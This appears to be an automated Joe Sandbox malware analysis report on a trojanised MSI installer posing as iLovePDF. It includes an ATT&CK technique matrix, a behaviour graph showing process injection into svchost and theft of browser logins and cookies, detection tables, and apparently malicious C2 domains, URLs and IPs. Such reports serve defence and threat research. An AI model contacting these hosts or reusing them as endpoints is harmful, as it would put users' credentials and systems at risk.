Replication Through Removable Media1Service Execution12Create Account1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11Peripheral Device Discovery11Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Valid Accounts1Valid Accounts1Obfuscated Files or Information21Credentials In Files1System Service Discovery1SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Windows Service11Access Token Manipulation11Software Packing21NTDSFile and Directory Discovery3Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronRegistry Run Keys / Startup Folder1Windows Service11DLL Side-Loading1LSA SecretsSystem Information Discovery47SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdBootkit1Process Injection823File Deletion1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Masquerading122DCSyncSecurity Software Discovery471Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts1Proc FilesystemVirtualization/Sandbox Evasion131Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Modify Registry1/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion131Network SniffingApplication Window Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation11Input CaptureSystem Owner/User Discovery2Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection823KeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskBootkit1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
Trusted RelationshipPythonHypervisorProcess InjectionRundll321Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
Hardware AdditionsJavaScript/JScriptValid AccountsDynamic-link Library InjectionIndicator Removal on Host1Credential API HookingSystem Information DiscoveryExploit Enterprise ResourcesRemote Email CollectionAlternate Network MediumsExternal ProxyExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 508222 Sample: 6rfyiAq0nM Startdate: 24/10/2021 Architecture: WINDOWS Score: 74 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 3 other signatures 2->67 10 msiexec.exe 7 27 2->10         started        14 msiexec.exe 2 2->14         started        process3 file4 53 C:\Windows\Installer\MSIFBC3.tmp, PE32 10->53 dropped 89 Drops executables to the windows directory (C:\Windows) and starts them 10->89 16 MSIFBC3.tmp 2 10->16         started        signatures5 process6 file7 39 C:\Users\user\AppData\Local\...\MSIFBC3.tmp, PE32 16->39 dropped 19 MSIFBC3.tmp 25 32 16->19         started        process8 file9 41 C:\Program Files (x86)\...\is-VR0CA.tmp, PE32 19->41 dropped 43 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->43 dropped 45 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 19->45 dropped 47 13 other files (none is malicious) 19->47 dropped 22 rundll32.exe 3 19->22         started        process10 signatures11 73 Contains functionality to infect the boot sector 22->73 75 Contains functionality to inject threads in other processes 22->75 77 Contains functionality to inject code into remote processes 22->77 79 5 other signatures 22->79 25 svchost.exe 1 22->25 injected 28 svchost.exe 22->28 injected 30 svchost.exe 22->30 injected 32 14 other processes 22->32 process12 signatures13 81 System process connects to network (likely due to code injection or exploit) 25->81 83 Contains functionality to infect the boot sector 25->83 85 Contains functionality to inject threads in other processes 25->85 87 5 other signatures 25->87 34 svchost.exe 6 14 25->34         started        process14 dnsIp15 55 toa.mygametoa.com 34.64.183.91 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 34->55 57 208.95.112.1 TUT-ASUS United States 34->57 59 3 other IPs or domains 34->59 49 C:\Users\user\AppData\...\Login Data.tmp, SQLite 34->49 dropped 51 C:\Users\user\AppData\Local\...\Cookies.tmp, SQLite 34->51 dropped 69 Query firmware table information (likely to detect VMs) 34->69 71 Tries to harvest and steal browser information (history, passwords, etc) 34->71 file16 signatures17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
6rfyiAq0nM.msi31%VirustotalBrowse
6rfyiAq0nM.msi8%MetadefenderBrowse
6rfyiAq0nM.msi36%ReversingLabsWin32.Trojan.Waldek

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)0%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp5%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp0%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp9%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp26%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
13.2.rundll32.exe.4eb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
37.2.svchost.exe.1afba170000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
20.2.svchost.exe.1d91aad0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
28.0.svchost.exe.1111ac00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
24.0.svchost.exe.1dc51fb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
28.2.svchost.exe.1111ac00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
24.2.svchost.exe.1dc51fb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
37.0.svchost.exe.1afba170000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
30.2.svchost.exe.1be5cd40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
17.0.svchost.exe.204f3380000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
27.2.svchost.exe.2743a320000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
34.2.svchost.exe.202b28f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
16.2.svchost.exe.12e17870000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
34.0.svchost.exe.202b28f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
19.2.svchost.exe.233426d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
23.2.svchost.exe.28621cd0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
29.0.svchost.exe.22f12740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
29.2.svchost.exe.22f12740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
31.2.svchost.exe.21c23140000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
23.0.svchost.exe.28621cd0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
27.0.svchost.exe.2743a320000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
31.0.svchost.exe.21c23140000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
17.2.svchost.exe.204f3380000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
21.0.svchost.exe.2f2c5c00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
38.0.svchost.exe.25c96c80000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
25.2.svchost.exe.2216b8b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
30.0.svchost.exe.1be5cd40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
22.0.svchost.exe.222cab20000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
22.2.svchost.exe.222cab20000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
14.2.svchost.exe.24b7d0d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
19.0.svchost.exe.233426d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
21.2.svchost.exe.2f2c5c00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
38.2.svchost.exe.25c96c80000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
25.0.svchost.exe.2216b8b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
14.0.svchost.exe.24b7d0d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
20.0.svchost.exe.1d91aad0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File

Domains

SourceDetectionScannerLabelLink
toa.mygametoa.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https:///xboxlive.com0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://fg.mygameagend.com/report7.4.php6%VirustotalBrowse
https://fg.mygameagend.com/report7.4.php0%Avira URL Cloudsafe
https://bh.mygameadmin.com/0%Avira URL Cloudsafe
https:///live.com0%Avira URL Cloudsafe
https://fg.mygameagend.com/0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
https://www.remobjects.com/ps0%URL Reputationsafe
http://subca.ocsp-certum.com010%URL Reputationsafe
https://www.innosetup.com/0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://jrsoftware.org00%Avira URL Cloudsafe
https://bh.mygameadmin.com/report7.4.phpile0%Avira URL Cloudsafe
https://login.windows.netll0%Avira URL Cloudsafe
https://login.windows.netm0%Avira URL Cloudsafe
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d0%Avira URL Cloudsafe
https://login.windows.netB7E5B0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://w.ijg.0%Avira URL Cloudsafe
https://bh.mygameadmin.com/report7.4.php0%Avira URL Cloudsafe
https://p-api.com/json/?fields=81980%Avira URL Cloudsafe
http://cscasha2.ocsp-certum.com040%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
https:///windows.net0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://fg.mygameagend.com/dll0%Avira URL Cloudsafe
https://xsts.auth.xboxlive.com20%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
toa.mygametoa.com
34.64.183.91
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://fg.mygameagend.com/report7.4.phptrue
  • 6%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bh.mygameadmin.com/report7.4.phpfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUMSIFBC3.tmp, 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, 6rfyiAq0nM.msifalse
    		high
    https://login.windows.netsvchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpfalse
      		high
      https://support.google.com/chrome/?p=plugin_realaudio/vnd.rn-realaudiovideo/vnd.rn-realvideoaudio/x-svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
        		high
        https:///xboxlive.comsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        https://support.google.com/chrome/?p=plugin_javaapplication/x-java-appletapplication/x-java-applet;jsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
          		high
          http://repository.certum.pl/cscasha2.cer0MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
            		high
            http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurlsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://support.google.com/chrome/?p=plugin_wmpsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
              		high
              http://ocsp.sectigo.com0MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
              • URL Reputation: safe
              		unknown
              https://support.google.com/chrome/?p=plugin_pdfapplication/pdfapplication/vnd.adobe.x-marsapplicatiosvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                		high
                http://forms.real.com/real/realone/download.html?type=rpsp_ushttp://service.real.com/realplayer/secusvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                  		high
                  https://support.google.com/chrome/answer/6258784svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                    		high
                    https://xsts.auth.xboxlive.comsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                      		high
                      https://support.google.com/chrome/?p=plugin_quicktimeapplication/sdpapplication/x-mpegapplication/x-svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                        		high
                        https://support.google.com/chrome/?p=plugin_flashsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                          		high
                          https://bh.mygameadmin.com/svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.google.com/chrome/?p=plugin_javasvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                            		high
                            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineMSIFBC3.tmpfalse
                              		high
                              https:///live.comsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://support.google.com/chrome/?p=plugin_realsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                		high
                                https://fg.mygameagend.com/svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.interoperabilitybridges.com/wmp-extension-for-chromesvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.remobjects.com/psMSIFBC3.tmp, MSIFBC3.tmp.10.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://subca.ocsp-certum.com01MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.innosetup.com/MSIFBC3.tmp, MSIFBC3.tmp, 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, MSIFBC3.tmp.10.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://support.google.com/chrome/?p=plugin_pdfsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                  		high
                                  https://sectigo.com/CPS0DMSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://support.google.com/chrome/?p=plugin_divxsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                    		high
                                    http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Slsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://jrsoftware.org0MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://jrsoftware.org/MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                        		high
                                        https://bh.mygameadmin.com/report7.4.phpilesvchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://forms.real.com/real/realone/download.html?type=rpsp_ussvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.certum.pl/CPS0MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                            		high
                                            https://login.windows.netllsvchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://login.windows.netmsvchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://pcbmhome.com/click.php?cnv_id=%s&cl=%dsvchost.exefalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://login.windows.netB7E5Bsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exesvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                              		high
                                              http://repository.certum.pl/ctnca.cer09MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                		high
                                                https://support.google.com/chrome/?p=plugin_quicktimesvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid8.9mverp=https://bh.svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpfalse
                                                    		high
                                                    http://crl.certum.pl/ctnca.crl0kMSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                      		high
                                                      http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exerequires_authorizationstatussvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://crl.ver)svchost.exe, 00000011.00000002.533096417.00000204EFAAD000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://w.ijg.is-30MA7.tmp.11.dr, is-UKPSI.tmp.11.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://support.google.com/chrome/?p=plugin_divxvideo/x-matroskavideo/divxsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://www.certum.pl/CPS0MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                            		high
                                                            http://crl.certum.pl/cscasha2.crl0qMSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                              		high
                                                              https://login.windows.net/7E5Bsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://p-api.com/json/?fields=8198svchost.exe, 00000010.00000003.421876578.0000012E1764D000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://cscasha2.ocsp-certum.com04MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tMSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://login.windows.net/svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://service.real.com/realplayer/security/02062012_player/en/svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://support.google.com/chrome/?p=plugin_shockwaveapplication/x-directorsvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://support.google.com/chrome/?p=plugin_shockwavesvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://ip-api.com/json/?fields=8198svchost.exefalse
                                                                          		high
                                                                          https:///windows.netsvchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://fg.mygameagend.com/dllsvchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://support.google.com/chrome/?p=plugin_wmpWindowssvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.instagram.com/accounts/edit/svchost.exefalse
                                                                              		high
                                                                              https://xsts.auth.xboxlive.com2svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://support.google.com/chrome/?p=plugin_flashapplication/futuresplashapplication/x-shockwave-flasvchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://xsts.auth.xboxlive.com/svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpfalse
                                                                                  		high

                                                                                  Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  208.95.112.1
                                                                                  		unknownUnited States
                                                                                  		53334TUT-ASUSfalse
                                                                                  172.67.167.122
                                                                                  		unknownUnited States
                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                  34.64.183.91
                                                                                  		toa.mygametoa.comUnited States
                                                                                  		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue
                                                                                  104.21.75.46
                                                                                  		unknownUnited States
                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                  Private

                                                                                  IP
                                                                                  192.168.2.1

                                                                                  General Information

                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                  Analysis ID:508222
                                                                                  Start date:24.10.2021
                                                                                  Start time:12:48:10
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 15m 23s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Sample file name:6rfyiAq0nM (renamed file extension from none to msi)
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:23
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal74.troj.spyw.evad.winMSI@10/39@2/5
                                                                                  EGA Information:Failed
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 26.2% (good quality ratio 22.7%)
                                                                                  • Quality average: 60.6%
                                                                                  • Quality standard deviation: 33.8%
                                                                                  HCA Information:Failed
                                                                                  Cookbook Comments:
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Override analysis time to 240s for rundll32
                                                                                  Warnings:
                                                                                  Show All
                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, wuapihost.exe
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  12:50:06API Interceptor68x Sleep call for process: svchost.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  208.95.112.1NaVEQ76t88.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  7PPXbfDkRN.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  kBbwXpCn0c.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  13294_Video_Oynat#U0131c#U0131.apkGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  Comprobante de pago.xlsGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  Comprobante de pago.docGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  Pv9HB349oG.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  PozfYoUNtW.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  DiscordSniper.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com//json/102.129.143.33
                                                                                  Nightmare Booter (DDos) [IP Stresser] (1).exeGet hashmaliciousBrowse
                                                                                  • ip-api.com//json/102.129.143.33
                                                                                  HazardNuker.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/line/?fields=hosting
                                                                                  2wY8F2BCNp.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  7WVpng6phO.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  Comprobante de pago (OCT).xlsGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  tywt33OZI0.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  7mqSo6rtA0.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  nIXnNtZvtI.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  nKnpb3gEQR.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json/
                                                                                  Xg4Pb7Cx99.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json
                                                                                  z7PRVhbVyw.exeGet hashmaliciousBrowse
                                                                                  • ip-api.com/json

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  toa.mygametoa.comqx881BiW17.exeGet hashmaliciousBrowse
                                                                                  • 34.64.183.91
                                                                                  1FR4w7fupN.exeGet hashmaliciousBrowse
